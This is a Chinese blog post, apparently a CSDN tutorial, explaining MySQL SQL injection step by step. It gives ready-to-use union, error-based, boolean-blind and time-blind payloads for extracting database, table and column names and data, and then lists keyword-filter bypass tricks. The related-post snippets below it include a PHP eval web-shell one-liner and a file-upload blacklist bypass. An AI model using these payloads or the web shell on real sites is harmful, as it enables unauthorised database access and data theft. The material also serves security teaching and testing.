SQL注入原理及步骤以及黑名单绕过方式_java sql注入黑名单绕过

于 2024-05-13 03:44:13 发布
阅读量1.2k 收藏 13
点赞数 20
分类专栏: 程序员 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84970145/article/details/138778081
版权

mysql5.0以上的版本存在一个information_schema数据库,information_schema数据库包含3个表如下:

步骤

判断是否存在sql注入:

分别输入不同的id值:

——有结果:1’and 1=1#

——无结果:1’and 1=2#

——出错:1’

——正常:1’'(两个单引号)

换成双引号同理。

判断查询结果有多少列:

——1’order by 1#(不报错)

——1’order by 2#(不报错)

——1’order by 3#(不报错)

——1’order by 4#(报错)

——这就说明结果有3列。

选择注入方式:

联合注入(union)、报错注入(extractvalue、updatexml)、布尔盲注(当回显只能判断对错的时候用)、时间盲注(布尔盲注的升级版,没有回显或者回显判断不了对错的时候用,根据页面的反馈时间来判断对错)。

获取数据库名:

联合注入:-1’union select 1,database(),3#

报错注入:'and extractvalue(1,concat(0x7e,(select database()),0x7e))–+

布尔盲注:1’ and ascii(substr((select database()),1,1))=115–+

时间盲注:1’ and if(ascii(substr((select database()),1,1))=115,sleep(3),1)–+

获取表名:

-1’union select 1,(select table_name from information_schema.tables where table_schema=’数据库名’limit 0,1),3#

也可以不用limit,表示从哪一列开始,取多少列。

获取列名:

-1’union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=’数据库名’ and table_name=’表名’),3#

获取列中数据:

-1’ union select 1,(select 列名 from 表名 limit 0,1),3#

黑名单绕过

空格绕过:

/**/(/的url编码为%2f,*的url编码为%2a)

() ——例如:select(1),2,3;(括号的url编码为%28、%29)

回车(url编码为%0a)

`(url编码为%60)

tab(url编码为%09(水平)、%0b(垂直))

大小写绕过

双写关键字绕过

绕过and和or和=:

and可以用%26%26替代,也可以用&&表示。

or可以用||表示。

=可以用like代替。

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

*如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84970145
关注
  • 20
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
27-4 文件上传漏洞 - 黑名单绕过
weixin_43263566的博客
03-18 513
可以将php文件的后缀改成上述的其他可用后缀名如:php2、php3、....,但是这种方式有个前提需要配置靶场的服务器,才能让服务器将这种后缀名识别为php,所以我感觉这种绕过方式不是很实用,这里使用 .htaccess文件来绕过。尝试上传这个带有不合法后缀名的文件,如果可以正常上传,则说明目标系统的后台可能存在黑名单绕过或者未进行绕过处理;上传成功后我们就可以将我们要上传到靶场中的php文件改名为 4.png 之后我们就可以操作这个文件,我这里上传php一句话马的文件,后面使用蚁剑连接。
第十八节 绕过剔除黑名单(union和select)的SQL注入-01
09-15
绕过剔除黑名单(union和select)的SQL注入 SQL注入是一种常见的Web应用安全漏洞,攻击者可以通过在用户输入中注入恶意SQL代码来获取敏感数据或控制数据库绕过剔除黑名单(union和select)的SQL注入SQL注入攻击...
SQL注入原理步骤以及黑名单绕过方式
lxz021202的博客
04-01 1338
总结SQL注入原理及其步骤,包括不同类型的注入方法,还有黑名单绕过方法。
记一次奇葩的sql注入联合查询黑名单绕过与布尔盲注绕过
weixin_48421613的博客
10-27 4576
近日为甲方爸爸挖漏洞,又是遇到奇葩SQL注入的一天。 首先,页面是这个样子滴 注意两个蓝色的框 一个小单引号之后,报错了,好样的,sql注入无疑了 由于是Get型注入,所以一开始想直接用union联合查询 使用二分法得知,字段数量是9 2. 使用联合查询,这里被拦住了 代码君已私奔到月球,这是啥玩意? 一开始以为是最常见的 union select 联合查询黑名单过滤,于是乎使用了大部分的方式都是对这两个单次进行绕过,什么大小写、双拼、编码转换,这里要说的是, /**/ 这种的也会被屏蔽 而后
【安全】P 2-18 绕过剔除黑名单(union和select)的SQL注入
Z_David_Z的博客
02-15 627
目录0X01 基础知识介绍0X02 去除(union)的代码分析0X03 绕过去除(union)的sql的注入0X04 sqlmap安全检测 0X01 基础知识介绍 1、Mysql中的大小写不敏感,大写与小写一样。 2、Mysql 中的十六进制与URL编码通过解码识别。 3、符号和关键字替换 and – &&、or – ||。 4、空格使用 %20表示、%0a换行 %09 tab 0X02 去除(union)的代码分析 preg_replace(mixed $pattern , mixed
SQL注入实战:绕过操作
ting_liang的博客
01-27 2209
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAF(Web Application Firewall)的常见特征是指其具有审计...
sql.rar_SQL防注入_asp 防注入_sql注入_防破
09-22
首先,了解SQL注入的基本原理是至关重要的。攻击者通常利用网站应用对用户输入数据的不恰当处理,将恶意SQL语句插入到正常的查询中。例如,如果一个登录页面没有进行有效的验证,攻击者可以通过输入"admin' OR '1'='...
基于SimHash算法的SQL注入攻击检测方法
04-30
提出一种基于SimHash算法的SQL注入检测方法,首先通过自学习过程将每一条SQL语句经过分词、散列、加权、合并,降维生成初始SimHash指纹库,然后基于SimHash利用初始指纹库构建具有索引结构的SimHash指纹库,再结合非...
SQL注入
WX公众号-小白学安全
03-31 256
SQL注入概述 SQLSQL(Structured Query Language) – 结构化查询语句 ​ 用途:用于存取数据以及查询、更新和管理关系数据库系统 什么是SQL注入? ​ SQL注入是服务器端未严格校验客户端发送的数据,而导致服务器端SQL语句被恶意修改并成功执行的行为 本质:把用户输入的数据当作代码执行 注入产生原因 代码对带入SQL语句的参数过滤不严格 未启用框架的安全配置。例如:PHP的magic_quotes_gpc 未使用框架安全的查询方法 测试接口未删除 未启用防火墙 未使
sql注入防范(2)
m0_74301705的博客
03-13 247
以下实例中,输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到 20 个字符之间:else{ echo "username 输入异常";当没有过滤特殊字符时,出现的SQL情况:// 设定$name 中插入了不需要的SQL语句以上的注入语句中,没有对 $name 的变量进行过滤,$name 中插入了不需要的SQL语句,将删除 users 表中的所有数据。
sql注入过滤绕过实例
Sumarua的博客
06-19 1456
靶场 云演sql注入过滤绕过靶场 漏洞分析 1、漏洞点:index.php 我们可以看到,在第38行,通过 GET方式传入了id 值,然后会经过过滤,然后直接拼接到 SQL 语句中。 由下图可知,picture.php 通过 GET 方式接收 id值,接收的值会直接拼接到SQL语句中,存在SQL注入漏洞,但是有过滤,需要我们绕过。 2、分析过滤字符 $black = [’=’,‘union’,’/’,’/’,‘order’,‘load’,‘by’,‘group’,‘sleep’,‘update’,‘de
【Web安全】SQL各类注入与绕过
最新发布
2401_84281638的博客
04-27 1106
其中concat()函数为连接函数,连接波浪号和查询信息,波浪号常常使用0x7e代替,substr为截取函数,因为报错信息最多32位,或者使用limit分页函数。
渗透测试-SQL注入手法与绕过手段
Sgirll的博客
06-17 901
union select 1,group_concat(table_name),3:使用 UNION 操作符,这部分查询语句返回一个包含三列数据的结果集:第一列是数字 1,第二列是目标数据库中所有数据表的名称列表,这里使用了 GROUP_CONCAT 函数进行聚合拼接,第三列是数字 3。该攻击利用了 SQL 注入漏洞,通过修改原有的 SQL 语句,绕过了应用程序的输入校验机制,从而对目标数据库造成了安全风险。id=1:假定这是一个 Web 应用程序的 URL 查询字符串参数,指定了 id 参数的值为 1。
kingshard SQL黑名单功能介绍
weixin_34087503的博客
01-25 273
kingshard SQL黑名单功能介绍 1. 应用场景介绍 在kingshard开源之后,有用户多次提到能不能在kingshard中加入SQL黑名单机制,让kingshard能够根据特定的规则来拦截在黑名单中的SQL。有几个比较典型的应用场景: DBA定义一些比较危险的SQL,放在SQL黑名单文件中。可以避免前端应用发过来的SQL对数...
黑名单绕过
qq_53365842的博客
04-20 893
在很多时候有限制文件上传的类型,而黑名单ban了很多相关的后缀,如果没有警用.htaccee那么就能触发getshell .htaccess可以把.jpg解析成php AddType application/x-httpd-php .jpg 先上传.htaccess文件,但是要修改后缀来绕过前端验证,在通过抓包修改回来 再上传jpg的文件,其实是将php一句话木马的文件改为jpg后缀 PHP: <?php @eval($_POST['404']);?> 用蚁剑连接 http
Mycat防火墙配置:IP白名单和 SQL黑名单说明
weixin_34363171的博客
09-04 1173
2019独角兽企业重金招聘Python工程师标准>>> ...
绕过黑名单验证
白菜执笔人的博客
03-05 3286
Web安全攻防 学习笔记 一、绕过黑名单验证(基本都用到 BurpSuite) 1.1、基于文件后缀名验证         对于文件上传模块来说,尽量避免上传可执行的脚本文件。为了防止上传脚本需要设置对应的验证 方式。最简单的就是设置文件后缀名验证。 验证方式的分类 (1)基于白名单验证:只针对白名单中有的后缀名,文件才能上传成功。 (2)基于黑名单...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值